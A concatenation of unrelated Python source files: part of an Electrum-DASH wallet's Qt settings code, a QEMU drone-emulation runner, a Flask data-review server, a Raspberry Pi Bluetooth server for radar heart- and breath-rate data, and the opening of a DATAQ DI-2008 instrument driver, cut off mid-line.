and self.fx.is_enabled() self.fiat_send_e.setVisible(b) self.fiat_receive_e.setVisible(b) self.history_list.refresh_headers() self.history_list.update() self.address_list.refresh_headers() self.address_list.update() self.update_status() def settings_dialog(self): self.need_restart = False d = WindowModalDialog(self, _('Preferences')) vbox = QVBoxLayout() tabs = QTabWidget() tabs.setObjectName("settings_tab") gui_widgets = [] fee_widgets = [] tx_widgets = [] id_widgets = [] # language lang_help = _('Select which language is used in the GUI (after restart).') lang_label = HelpLabel(_('Language') + ':', lang_help) lang_combo = QComboBox() from electrum_dash.i18n import languages lang_combo.addItems(list(languages.values())) try: index = languages.keys().index(self.config.get("language",'')) except Exception: index = 0 lang_combo.setCurrentIndex(index) if not self.config.is_modifiable('language'): for w in [lang_combo, lang_label]: w.setEnabled(False) def on_lang(x): lang_request = list(languages.keys())[lang_combo.currentIndex()] if lang_request != self.config.get('language'): self.config.set_key("language", lang_request, True) self.need_restart = True lang_combo.currentIndexChanged.connect(on_lang) gui_widgets.append((lang_label, lang_combo)) nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"') nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help) nz = QSpinBox() nz.setMinimum(0) nz.setMaximum(self.decimal_point) nz.setValue(self.num_zeros) if not self.config.is_modifiable('num_zeros'): for w in [nz, nz_label]: w.setEnabled(False) def on_nz(): value = nz.value() if self.num_zeros != value: self.num_zeros = value self.config.set_key('num_zeros', value, True) self.history_list.update() self.address_list.update() nz.valueChanged.connect(on_nz) gui_widgets.append((nz_label, nz)) def on_dynfee(x): self.config.set_key('dynamic_fees', x == Qt.Checked) self.fee_slider.update() dynfee_cb = QCheckBox(_('Use dynamic fees')) dynfee_cb.setChecked(self.config.is_dynfee()) dynfee_cb.setToolTip(_("Use fees recommended by the server.")) fee_widgets.append((dynfee_cb, None)) dynfee_cb.stateChanged.connect(on_dynfee) feebox_cb = QCheckBox(_('Edit fees manually')) feebox_cb.setChecked(self.config.get('show_fee', False)) feebox_cb.setToolTip(_("Show fee edit box in send tab.")) def on_feebox(x): self.config.set_key('show_fee', x == Qt.Checked) self.fee_e.setVisible(bool(x)) feebox_cb.stateChanged.connect(on_feebox) fee_widgets.append((feebox_cb, None)) self.fee_unit = self.config.get('fee_unit', 0) fee_unit_label = HelpLabel(_('Fee Unit') + ':', '') fee_unit_combo = QComboBox() fee_unit_combo.addItems([_('sat/byte'), _('mDASH/kB')]) fee_unit_combo.setCurrentIndex(self.fee_unit) def on_fee_unit(x): self.fee_unit = x self.config.set_key('fee_unit', x) self.fee_slider.update() fee_unit_combo.currentIndexChanged.connect(on_fee_unit) fee_widgets.append((fee_unit_label, fee_unit_combo)) msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\ + _('The following alias providers are available:') + '\n'\ + '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\ + 'For more information, see http://openalias.org' alias_label = HelpLabel(_('OpenAlias') + ':', msg) alias = self.config.get('alias','') alias_e = QLineEdit(alias) def set_alias_color(): if not self.config.get('alias'): alias_e.setStyleSheet("") return if self.alias_info: alias_addr, alias_name, validated = self.alias_info alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True)) else: alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) def on_alias_edit(): alias_e.setStyleSheet("") alias = str(alias_e.text()) self.config.set_key('alias', alias, True) if alias: self.fetch_alias() set_alias_color() self.alias_received_signal.connect(set_alias_color) alias_e.editingFinished.connect(on_alias_edit) id_widgets.append((alias_label, alias_e)) # SSL certificate msg = ' '.join([ _('SSL certificate used to sign payment requests.'), _('Use setconfig to set ssl_chain and ssl_privkey.'), ]) if self.config.get('ssl_privkey') or self.config.get('ssl_chain'): try: SSL_identity = paymentrequest.check_ssl_config(self.config) SSL_error = None except BaseException as e: SSL_identity = "error" SSL_error = str(e) else: SSL_identity = "" SSL_error = None SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg) SSL_id_e = QLineEdit(SSL_identity) SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '') if SSL_error: SSL_id_e.setToolTip(SSL_error) SSL_id_e.setReadOnly(True) id_widgets.append((SSL_id_label, SSL_id_e)) units = ['DASH', 'mDASH', 'uDASH'] msg = _('Base unit of your wallet.')\ + '\n1DASH=1000mDASH.\n' \ + _(' These settings affects the fields in the Send tab')+' ' unit_label = HelpLabel(_('Base unit') + ':', msg) unit_combo = QComboBox() unit_combo.addItems(units) unit_combo.setCurrentIndex(units.index(self.base_unit())) def on_unit(x, nz): unit_result = units[unit_combo.currentIndex()] if self.base_unit() == unit_result: return edits = self.amount_e, self.fee_e, self.receive_amount_e amounts = [edit.get_amount() for edit in edits] if unit_result == 'DASH': self.decimal_point = 8 elif unit_result == 'mDASH': self.decimal_point = 5 elif unit_result == 'uDASH': self.decimal_point = 2 else: raise Exception('Unknown base unit') self.config.set_key('decimal_point', self.decimal_point, True) nz.setMaximum(self.decimal_point) self.history_list.update() self.request_list.update() self.address_list.update() for edit, amount in zip(edits, amounts): edit.setAmount(amount) self.update_status() unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz)) gui_widgets.append((unit_label, unit_combo)) block_explorers = sorted(util.block_explorer_info().keys()) msg = _('Choose which online block explorer to use for functions that open a web browser') block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg) block_ex_combo = QComboBox() block_ex_combo.addItems(block_explorers) block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config))) def on_be(x): be_result = block_explorers[block_ex_combo.currentIndex()] self.config.set_key('block_explorer', be_result, True) block_ex_combo.currentIndexChanged.connect(on_be) gui_widgets.append((block_ex_label, block_ex_combo)) from electrum_dash import qrscanner system_cameras = qrscanner._find_system_cameras() qr_combo = QComboBox() qr_combo.addItem("Default","default") for camera, device in system_cameras.items(): qr_combo.addItem(camera, device) #combo.addItem("Manually specify a device", config.get("video_device")) index = qr_combo.findData(self.config.get("video_device")) qr_combo.setCurrentIndex(index) msg = _("Install the zbar package to enable this.") qr_label = HelpLabel(_('Video Device') + ':', msg) qr_combo.setEnabled(qrscanner.libzbar is not None) on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True) qr_combo.currentIndexChanged.connect(on_video_device) gui_widgets.append((qr_label, qr_combo)) usechange_cb = QCheckBox(_('Use change addresses')) usechange_cb.setChecked(self.wallet.use_change) if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False) def on_usechange(x): usechange_result = x == Qt.Checked if self.wallet.use_change != usechange_result: self.wallet.use_change = usechange_result self.wallet.storage.put('use_change', self.wallet.use_change) multiple_cb.setEnabled(self.wallet.use_change) usechange_cb.stateChanged.connect(on_usechange) usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.')) tx_widgets.append((usechange_cb, None)) def on_multiple(x): multiple = x == Qt.Checked if self.wallet.multiple_change != multiple: self.wallet.multiple_change = multiple self.wallet.storage.put('multiple_change', multiple) multiple_change = self.wallet.multiple_change multiple_cb = QCheckBox(_('Use multiple change addresses')) multiple_cb.setEnabled(self.wallet.use_change) multiple_cb.setToolTip('\n'.join([ _('In some cases, use up to 3 change addresses in order to break ' 'up large coin amounts and obfuscate the recipient address.'), _('This may result in higher transactions fees.') ])) multiple_cb.setChecked(multiple_change) multiple_cb.stateChanged.connect(on_multiple) tx_widgets.append((multiple_cb, None)) def fmt_docs(key, klass): lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")] return '\n'.join([key, "", " ".join(lines)]) choosers = sorted(coinchooser.COIN_CHOOSERS.keys()) chooser_name = coinchooser.get_name(self.config) msg = _('Choose coin (UTXO) selection method. The following are available:\n\n') msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items()) chooser_label = HelpLabel(_('Coin selection') + ':', msg) chooser_combo = QComboBox() chooser_combo.addItems(choosers) i = choosers.index(chooser_name) if chooser_name in choosers else 0 chooser_combo.setCurrentIndex(i) def on_chooser(x): chooser_name = choosers[chooser_combo.currentIndex()] self.config.set_key('coin_chooser', chooser_name) chooser_combo.currentIndexChanged.connect(on_chooser) tx_widgets.append((chooser_label, chooser_combo)) def on_unconf(x): self.config.set_key('confirmed_only', bool(x)) conf_only = self.config.get('confirmed_only', False) unconf_cb = QCheckBox(_('Spend only confirmed coins')) unconf_cb.setToolTip(_('Spend only confirmed inputs.')) unconf_cb.setChecked(conf_only) unconf_cb.stateChanged.connect(on_unconf) tx_widgets.append((unconf_cb, None)) # Fiat Currency hist_checkbox = QCheckBox() fiat_address_checkbox = QCheckBox() ccy_combo = QComboBox() ex_combo = QComboBox() def update_currencies(): if not self.fx: return currencies = sorted(self.fx.get_currencies(self.fx.get_history_config())) ccy_combo.clear() ccy_combo.addItems([_('None')] + currencies) if self.fx.is_enabled(): ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency())) def update_history_cb(): if not self.fx: return hist_checkbox.setChecked(self.fx.get_history_config()) hist_checkbox.setEnabled(self.fx.is_enabled()) def update_fiat_address_cb(): if not self.fx: return fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config()) def update_exchanges(): if not self.fx: return b = self.fx.is_enabled() ex_combo.setEnabled(b) if b: h = self.fx.get_history_config() c = self.fx.get_currency() exchanges = self.fx.get_exchanges_by_ccy(c, h) else: exchanges = self.fx.get_exchanges_by_ccy('USD', False) ex_combo.clear() ex_combo.addItems(sorted(exchanges)) ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange())) def on_currency(hh): if not self.fx: return b = bool(ccy_combo.currentIndex()) ccy = str(ccy_combo.currentText()) if b else None self.fx.set_enabled(b) if b and ccy != self.fx.ccy: self.fx.set_currency(ccy) update_history_cb() update_exchanges() self.update_fiat() def on_exchange(idx): exchange = str(ex_combo.currentText()) if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name(): self.fx.set_exchange(exchange) def on_history(checked): if not self.fx: return self.fx.set_history_config(checked) update_exchanges() self.history_list.refresh_headers() if self.fx.is_enabled() and checked: # reset timeout to get historical rates self.fx.timeout = 0 def on_fiat_address(checked): if not self.fx: return self.fx.set_fiat_address_config(checked) self.address_list.refresh_headers() self.address_list.update() update_currencies() update_history_cb() update_fiat_address_cb() update_exchanges() ccy_combo.currentIndexChanged.connect(on_currency) hist_checkbox.stateChanged.connect(on_history) fiat_address_checkbox.stateChanged.connect(on_fiat_address) ex_combo.currentIndexChanged.connect(on_exchange) fiat_widgets = [] fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo)) fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox)) fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox)) fiat_widgets.append((QLabel(_('Source')), ex_combo)) tabs_info = [ (fee_widgets, _('Fees')), (tx_widgets, _('Transactions')), (gui_widgets, _('Appearance')), (fiat_widgets, _('Fiat')), (id_widgets, _('Identity')), ] for widgets, name in tabs_info: tab = QWidget() grid = QGridLayout(tab) grid.setColumnStretch(0,1) for a,b in widgets: i = grid.rowCount() if b: if a: grid.addWidget(a, i, 0) grid.addWidget(b, i, 1) else: grid.addWidget(a, i, 0, 1, 2) tabs.addTab(tab, name) vbox.addWidget(tabs) vbox.addStretch(1) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) # run the dialog d.exec_() if self.fx: self.fx.timeout = 0 self.alias_received_signal.disconnect(set_alias_color) run_hook('close_settings_dialog') if self.need_restart: self.show_warning(_('Please restart Electrum-DASH to activate the new GUI settings'), title=_('Success')) def closeEvent(self, event): # It seems in some rare cases this closeEvent() is called twice if not self.cleaned_up: self.cleaned_up = True self.clean_up() event.accept() def clean_up(self): self.wallet.thread.stop() if self.network: self.network.unregister_callback(self.on_network) self.config.set_key("is_maximized", self.isMaximized()) if not self.isMaximized(): g = self.geometry() self.wallet.storage.put("winpos-qt", [g.left(),g.top(), g.width(),g.height()]) self.config.set_key("console-history", self.console.history[-50:], True) if self.qr_window: self.qr_window.close() self.close_wallet() self.gui_object.close_window(self) def plugins_dialog(self): self.pluginsdialog = d = WindowModalDialog(self, _('Electrum-DASH Plugins')) plugins = self.gui_object.plugins vbox = QVBoxLayout(d) # plugins scroll = QScrollArea() scroll.setEnabled(True) scroll.setWidgetResizable(True) scroll.setMinimumSize(400,250) vbox.addWidget(scroll) w = QWidget() scroll.setWidget(w) w.setMinimumHeight(plugins.count() * 35) grid = QGridLayout() grid.setColumnStretch(0,1) w.setLayout(grid) settings_widgets = {} def enable_settings_widget(p, name, i): widget = settings_widgets.get(name) if not widget and p and p.requires_settings(): widget = settings_widgets[name] = p.settings_widget(d) grid.addWidget(widget, i, 1) if widget: widget.setEnabled(bool(p and p.is_enabled())) def do_toggle(cb, name, i): p = plugins.toggle(name) cb.setChecked(bool(p)) enable_settings_widget(p, name, i) run_hook('init_qt', self.gui_object) for i, descr in enumerate(plugins.descriptions.values()): name = descr['__name__'] p = plugins.get(name) if descr.get('registers_keystore'): continue try: cb = QCheckBox(descr['fullname']) plugin_is_loaded = p is not None cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet) or plugin_is_loaded and p.can_user_disable()) cb.setEnabled(cb_enabled) cb.setChecked(plugin_is_loaded and p.is_enabled()) grid.addWidget(cb, i, 0) enable_settings_widget(p, name, i) cb.clicked.connect(partial(do_toggle, cb, name, i)) msg = descr['description'] if descr.get('requires'): msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires'))) grid.addWidget(HelpButton(msg), i, 2) except Exception: self.print_msg("error: cannot display plugin", name) traceback.print_exc(file=sys.stdout) grid.setRowStretch(len(plugins.descriptions.values()), 1) vbox.addLayout(Buttons(CloseButton(d))) d.exec_() def show_masternode_dialog(self): d = MasternodeDialog(self.masternode_manager, self) d.exec_() def proposals_changed(self): """Callback for when proposals change.""" if not self.masternode_manager: return self.update_proposals_tab()
vmrunner.py
""" Terminal Runner class """ __author__ = "Bruno Chianca Ferreira" __license__ = "MIT" __version__ = "0.5" __maintainer__ = "Bruno Chianca Ferreira" __email__ = "brunobcf@gmail.com" import traceback, os, logging, time, subprocess, threading from classes.runner.runner import Runner from core.nodes.base import CoreNode from classes.mobility import mobility class VMRunner(Runner): def __init__(self, emulation): self.setup(emulation) self.nodes_digest = {} self.iosocket_semaphore = False def setup(self, emulation): self.topology = emulation['vm']['topology'] self.number_of_nodes = emulation['vm']['number_of_nodes'] self.core = True if emulation['vm']['core'] == "True" else False self.disks = True if emulation['vm']['disks'] == "True" else False self.dump = True if emulation['vm']['dump'] == "True" else False self.mobility_model = emulation['vm']['mobility'] self.Mobility = mobility.Mobility(self, self.mobility_model) def start(self): self.run() def run(self): """ Runs the emulation of Virtual machines running QEMU """ #start core if self.core: self.core_topology() self.configure_batman() #start dumps if self.dump: #get simdir simdir = str(time.localtime().tm_year) + "_" + str(time.localtime().tm_mon) + "_" + str(time.localtime().tm_mday) + "_" + str(time.localtime().tm_hour) + "_" + str(time.localtime().tm_min) #createDumps(number_of_nodes, "./reports/" + simdir + "/tracer") if self.omnet: self.tcpdump(self.number_of_nodes, "./reports/" + simdir + "/tracer") if self.core: self.tcpdump_core(self.number_of_nodes, "./reports/" + simdir + "/tracer") if self.core: #pass sthread = threading.Thread(target=self.server_thread, args=()) sthread.start() self.configure_bridge() qemu_nodes = self.spawnQEMU(self.session, self.number_of_nodes) while True: time.sleep(0.1) # shutdown session logging.info("Simulation finished. Killing all processes") if self.core: self.coreemu.shutdown() os.system("sudo killall xterm") os.system("chown -R " + username + ":" + username + " ./reports") def configure_bridge(self): process = [] for i in range(0,self.number_of_nodes): shell = self.session.get_node(i+1, CoreNode).termcmdstring(sh="/bin/bash") command = "ip tuntap add tap0 mode tap" command += " && ip link add br0 type bridge" command += " && ip link set br0 up" command += " && ip link set tap0 up" command += " && ip link set tap0 master br0" command += " && ip link set bat0 master br0" shell += " -c '" + command + "'" node = subprocess.Popen([ "xterm", "-e", shell], stdin=subprocess.PIPE, shell=False) process.append(node) def spawnQEMU(self, session, number_of_nodes): print("Starting QEMU") nodes = {} for i in range(0,number_of_nodes): shell = session.get_node(i+1, CoreNode).termcmdstring(sh="/bin/bash") command = "qemu-system-x86_64" command += " -m 2048" command += " -boot d -enable-kvm -smp 3" command += " -hda /opt/vms/linux_x86_" + str(i+1) + ".img" command += " -device e1000,netdev=mynet1,mac=DE:AD:BE:EF:00:0" + str(i+1) command += " -netdev tap,id=mynet1,ifname=tap0,script=no" shell += " -c '" + command + "'" node = subprocess.Popen([ "xterm", "-e", shell], stdin=subprocess.PIPE, shell=False) nodes["drone" + str(i)] = node return nodes
review_server.py
#!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from flask import Flask, Blueprint, send_file, jsonify, request import os import atexit import signal import csv import sys import time import threading def run( build_dir, port, output, csv_headers, json=False, database_task_name=None, debug=False, ): global index_file, app global ready_for_next, current_data, finished, index_file global counter if not debug or output == "": # disable noisy logging of flask, https://stackoverflow.com/a/18379764 import logging flask_log = logging.getLogger("werkzeug") flask_log.disabled = True flask_cli = sys.modules["flask.cli"] flask_cli.show_server_banner = lambda *x: None app = Flask( __name__, root_path=os.getcwd(), static_url_path="/static", static_folder=build_dir + "/static", ) def json_reader(f): import json for jsonline in f: yield json.loads(jsonline) def mephistoDBReader(): from mephisto.abstractions.databases.local_database import LocalMephistoDB from mephisto.tools.data_browser import DataBrowser as MephistoDataBrowser db = LocalMephistoDB() mephisto_data_browser = MephistoDataBrowser(db=db) def format_data_for_review(data): contents = data["data"] return f"{data}" units = mephisto_data_browser.get_units_for_task_name(database_task_name) for unit in units: yield format_data_for_review(mephisto_data_browser.get_data_from_unit(unit)) def consume_data(): global ready_for_next, current_data, finished, counter if database_task_name is not None: data_source = mephistoDBReader() elif json: data_source = json_reader(iter(sys.stdin.readline, "")) else: data_source = csv.reader(iter(sys.stdin.readline, "")) if csv_headers: next(data_source) finished = False counter = 0 for row in data_source: ready_for_next = threading.Event() current_data = row counter += 1 ready_for_next.wait() finished = True @app.route("/data_for_current_task") def data(): global current_data, finished if finished: func = request.environ.get("werkzeug.server.shutdown") if func is None: raise RuntimeError("Not running with the Werkzeug Server") func() return jsonify( {"finished": finished, "data": current_data if not finished else None} ) @app.route("/submit_current_task", methods=["GET", "POST"]) def next_task(): global current_data, ready_for_next, finished, counter result = ( request.get_json(force=True) if request.method == "POST" else request.ags.get("result") ) if output == "": sys.stdout.write("{}\n".format(result)) sys.stdout.flush() else: with open(output, "a+") as f: f.write("{}\n".format(result)) ready_for_next.set() time.sleep(0) return jsonify({"finished": finished, "counter": counter}) @app.route("/") def index(): global index_file return send_file(build_dir + "/index.html") @app.after_request def after_request(response): response.headers.add("Access-Control-Allow-Origin", "*") response.headers.add( "Access-Control-Allow-Headers", "Content-Type,Authorization" ) response.headers.add( "Access-Control-Allow-Methods", "GET,PUT,POST,DELETE,OPTIONS" ) response.headers.add("Cache-Control", "no-store") return response thread = threading.Thread(target=consume_data) thread.start() if sys.stdout.isatty(): print("Running on http://127.0.0.1:{}/ (Press CTRL+C to quit)".format(port)) app.run(debug=False, port=port)
bluetooth_server_module.py
import queue import time import threading import bluetooth import math import random import socket import subprocess # for Raspberry Pi shutdown import os class BluetoothServer: # run = True # Argument for shuting down all loops at the same time with input from one device. def __init__(self, list_of_variables_for_threads): # List of all variables from main to class. self.list_of_variables_for_threads = list_of_variables_for_threads self.go = list_of_variables_for_threads["go"] # Bluetooth variables self.client_list = [] # list for each connected device, sockets self.address_list = [] # list for mac-adresses from each connected device # self.read_thread_list = [] # list for threads to recieve from each device self.host = "" self.port = 1 self.client = None # Setup server for bluetooth communication self.server = bluetooth.BluetoothSocket(bluetooth.RFCOMM) self.server.setblocking(0) # Makes server.accept() non-blocking, used for "poweroff" # TEMP: Data from radar used to make sure data can be accepted between threads # Queue from radar class to test if queue communication work self.RR_final_queue = list_of_variables_for_threads["RR_final_queue"] self.RTB_final_queue = list_of_variables_for_threads["RTB_final_queue"] self.run_measurement = list_of_variables_for_threads["run_measurement"] self.start_write_to_csv_time = list_of_variables_for_threads["start_write_to_csv_time"] self.initiate_write_heart_rate = list_of_variables_for_threads["initiate_write_heart_rate"] print('Bluetooth Socket Created') try: self.server.bind((self.host, self.port)) print("Bluetooth Binding Completed") except: print("Bluetooth Binding Failed") # Can be accessed from main-program to wait for it to close by .join() self.connect_device_thread = threading.Thread( target=self.connect_device) # Starts thread which accepts new devices self.connect_device_thread.start() def app_data(self): # The main loop which takes data from processing and sends data to all clients while self.go: pass # while len(self.client_list) == 0: # time.sleep(1) # continue # self.schmitt_to_app() # self.real_time_breating_to_app() # data = self.add_data(2) # TEMP: Makes random data for testing of communication # data_pulse, data_breath = data.split(' ') # Splits data in pulse and heart rate # self.write_data_to_app(data_pulse, 'heart rate') # Sends pulse to app # self.write_data_to_app(data_breath, 'breath rate') # Sends heart rate to app def schmitt_to_app(self): try: # TEMP: Takes data from Schmitt trigger while len(self.RR_final_queue) == 0 and self.go: time.sleep(0.001) schmitt_data = self.RR_final_queue.get_nowait() # print("got data from queue") self.write_data_to_app(schmitt_data, 'breath rate') # schmitt_data = ' BR ' + schmitt_data + ' ' # TODO ändra till RR istället för BR i appen också # print("made string") # self.send_data(schmitt_data) # print("sent data") except: print("timeout RR queue") def real_time_breating_to_app(self): try: # while self.RTB_final_queue.empty() and self.go: # time.sleep(0.005) # TEMP: Takes data from filtered resp.rate real_time_breating_to_app = self.RTB_final_queue.get_nowait() # print("Real time breathing to app {}".format(real_time_breating_to_app)) self.write_data_to_app(real_time_breating_to_app, 'real time breath') if not self.RR_final_queue.empty(): schmitt_data = self.RR_final_queue.get_nowait() self.write_data_to_app(schmitt_data, 'breath rate') except: print(len(self.RR_final_queue)) def connect_device(self): #os.system("echo 'power on\nquit' | bluetoothctl") # Startup for bluetooth on rpi TODO thread_list = [] # List which adds devices self.server.listen(7) # Amount of devices that can simultaniously recive data. while self.go: # Loop which takes listens for a new device, adds it to our list # and starts a new thread for listening on input from device try: c, a = self.server.accept() except: if self.go == False: break # print("Still accepting new phones" + str(error)) continue self.client_list.append(c) self.address_list.append(a) # one thread for each connected device thread_list.append(threading.Thread(target=self.read_device)) thread_list[-1].start() print(thread_list[-1].getName()) print(thread_list[-1].isAlive()) print("New client: ", a) print("Out of while True in connect device") # Gracefully close all device threads for thread in thread_list: print(str(thread.getName()) + str(thread.isAlive())) thread.join() print(str(thread.getName()) + " is closed") print("End of connect_device thread") def read_device(self): c = self.client_list[-1] # Takes last added device and connects it. print(c) print(self.address_list[-1]) try: while self.go: data = c.recv(1024) # Input argument from device data = data.decode('utf-8') data = data.strip() print(data) # When device sends "poweroff" initiate shutdown by setting go to false, removing all clients and closing all threads. if data == 'poweroff': print("Shutdown starting") try: #self.go = [] #self.list_of_variables_for_threads["go"] = self.go.pop(0) #list_of_variables_for_threads["go"] = go.pop(0) self.go.pop(0) print("go= " + str(self.go)) for client in self.client_list: print('try to remove client ' + str(self.address_list[self.client_list.index(client)])) client.close() print('remove client ' + str(self.address_list[self.client_list.index(client)])) self.server.close() print("server is now closed") os.system("echo 'power off\nquit' | bluetoothctl") # TODO except Exception as error: print("exception in for-loop in read_device: " + str(error)) if not self.go: print("Shutdown starting") try: #self.go = [] #self.list_of_variables_for_threads["go"] = self.go.pop(0) #list_of_variables_for_threads["go"] = go.pop(0) # self.go.pop(0) print("go= " + str(self.go)) for client in self.client_list: print('try to remove client ' + str(self.address_list[self.client_list.index(client)])) client.close() print('remove client ' + str(self.address_list[self.client_list.index(client)])) self.server.close() print("server is now closed") os.system("echo 'power off\nquit' | bluetoothctl") # TODO except Exception as error: print("exception in for-loop in read_device: " + str(error)) elif data == 'startMeasure': self.run_measurement.append(c) self.list_of_variables_for_threads["run_measurement"] = self.run_measurement print("Device added") elif data == 'stopMeasure': if c in self.run_measurement: self.run_measurement.remove(c) self.list_of_variables_for_threads["run_measurement"] = self.run_measurement print("Device removed") elif data == 'write': print("Bluetooth Write started") self.initiate_write_heart_rate.append(0) self.list_of_variables_for_threads["initiate_write_heart_rate"] = self.initiate_write_heart_rate self.start_write_to_csv_time = time.time() self.list_of_variables_for_threads["start_write_to_csv_time"] = self.start_write_to_csv_time # self.initiate_write_heart_rate except Exception as error: print("last exception read_device: " + str(error)) c.close() print('remove client: ' + str(self.address_list[self.client_list.index(c)])) if c in self.run_measurement: self.run_measurement.remove(c) self.client_list.remove(c) def write_data_to_app(self, data, data_type): # print(data + ' ' + data_type) if data_type == 'heart rate': string = ' HR ' + str(data) + ' ' # print(string) self.send_data(string) elif data_type == 'breath rate': string = ' RR ' + str(data) + ' ' # print(string) self.send_data(string) elif data_type == 'real time breath': string = ' RTB ' + str(data) + ' ' self.send_data(string) def send_data(self, write): # print('Send data: ' + write) for client in self.client_list: # Send the same data to all clients connected try: client.send(write.encode('utf-8')) # write.encode('utf-8') except Exception as error: print("Error send_data" + str(error)) def add_data(self, i): # TEMP: Make data somewhat random. data = [70 + math.sin(i), 20 + math.sin(i+math.pi/4)] noise = random.random() data[0] += 5*(noise - 0.5) noise = random.random() data[1] += noise data[0] = round(data[0]) data[1] = round(data[1]) return str(data[0]) + ' ' + str(data[1]) # def get_data_from_queue(self): # self.send_to_app_queue.put(self.add_data(1)) # return self.send_to_app_queue.get() # @staticmethod # Test to send run variable to other threads, does not work yet. # def get_run(self): # return self.run
instrument.py
""" Implements some of the functionality of the DATAQ DI-2008 data acquisition module. """ from datetime import datetime, timedelta from enum import Enum import logging import threading from time import sleep from typing import List from serial import Serial from serial.tools import list_ports from serial.serialutil import SerialException _logger = logging.getLogger(__name__) def _discover_auto(): candidate_ports = [] available_ports = list(list_ports.comports()) for p in available_ports: # Do we have a DATAQ Instruments device? if "VID:PID=0683" in p.hwid: candidate_ports.append(p.device) _logger.debug(f'DI-2008 instruments detected on: {", ".join(candidate_ports)}') try: return candidate_ports[0] except IndexError: return None def _discover_by_esn(serial_number: str): buffering_time = 0.2 correct_port = None candidate_ports = [] available_ports = list(list_ports.comports()) for p in available_ports: # Do we have a DATAQ Instruments device? if "VID:PID=0683" in p.hwid: candidate_ports.append(p.device) _logger.debug(f'DI-2008 instruments detected on: {", ".join(candidate_ports)}') for port_name in candidate_ports: _logger.info(f'checking candidate port {port_name}...') if correct_port is not None: break try: port = Serial(port_name, baudrate=115200) except SerialException: _logger.warning(f'candidate port {port_name} not accessible') port = None if port is not None: message = '' while 'stop' not in message: port.flush() port.write(f'stop\r\n'.encode()) sleep(buffering_time) data = port.read(port.in_waiting) characters = [chr(b) for b in data if b != 0] message = ''.join(characters).strip() _logger.debug(f'stop command response: {message}') port.write(f'info 6\r\n'.encode()) sleep(buffering_time) data = port.read(port.in_waiting) _logger.debug(f'data from {port_name}: {data}') characters = [chr(b) for b in data if b != 0] message = ''.join(characters).strip() _logger.debug(f'message from {port_name}: {message}') parts = message.strip().split(' ') if len(parts) == 3: esn = parts[2] if esn == serial_number.upper(): correct_port = port_name port.close() if correct_port is None: _logger.warning(f'DI-2008 serial number {serial_number} not found') else: _logger.info(f'DI-2008 serial number {serial_number} found on {correct_port}') return correct_port class AnalogPortError(Exception): """ Raised when there is an analog-port related error on the DI-2008 """ pass class DigitalPortError(Exception): """ Raised when there is a digital port related error on the DI-2008 """ pass class PortNotValidError(Exception): """ Raised when there is a port access attempted where a physical port does \ not exist. """ pass class DigitalDirection(Enum): """ Used to set the direction """ INPUT = 0 """Indicates that the port direction is to be an input""" OUTPUT = 1 """Indicates that the port direction is to be an output""" class Port: _mode_bit = 12 _range_bit = 11 _scale_bit = 8 def __init__(self, callback: callable=None, loglevel=logging.DEBUG): self._logger = logging.getLogger(self.__class__.__name__) self._logger.setLevel(loglevel) self._callback = callback self.value = None self._last_received = None self.configuration = 0 self.commands = [] @property def is_active(self): age = datetime.now() - self._last_received max_age = timedelta(seconds=3) if self._last_received is None or (age > max_age): self._logger.info(f'{self} does not appear to be active') return False return True def parse(self, value): raise NotImplementedError class AnalogPort(Port): """ Analog input port which may be configured as a strict voltage monitor or \ as a thermocouple input. :param channel: integer, the channel number as seen on the front of \ the devices, which is to say, the first channel is ``1`` instead of ``0`` :param analog_range: float, the expected range when configurated as an \ analog input; valid values are in [0.01, 0.025, 0.05, 0.1, 0.25, 0.5, \ 1.0, 2.5, 5.0, 10.0, 25.0, 50.0] while invalid values will raise a \ ``ValueError`` :param thermocouple_type: string, a single letter denoting the \ thermocouple type; valid values are in ['b', 'e', 'j', 'k', 'n', 'r', \ 's', 't'] and invalid values will raise a ``ValueError`` :param filter: string, a string containing 'last point', 'average', \ 'maximum' or 'minimum' as defined in the device datasheet :param filter_decimation: int, an integer containing the number of \ samples over which to filter as defined in the device datasheet :param loglevel: the logging level, i.e. ``logging.INFO`` """ def __init__(self, channel: int, analog_range: float = None, thermocouple_type: str = None, filter: str = 'last point', filter_decimation: int = 10, loglevel=logging.INFO): super().__init__(loglevel=loglevel) if channel == 0: raise AnalogPortError(f'channel 0 is invalid, note that the ' f'channel numbers line up with the hardware.') if channel not in range(1, 9): raise AnalogPortError(f'channel "{channel}" is invalid, ' f'expected 1 to 8, inclusivie') configuration = channel - 1 if analog_range is not None and thermocouple_type is not None: raise ValueError(f'analog range and thermocouple type are ' f'both specified for analog channel {channel}') if analog_range is not None: valid_ranges = [0.01, 0.025, 0.05, 0.1, 0.25, 0.5, 1.0, 2.5, 5.0, 10.0, 25.0, 50.0] if analog_range not in valid_ranges: strings = [str(v) for v in valid_ranges] raise 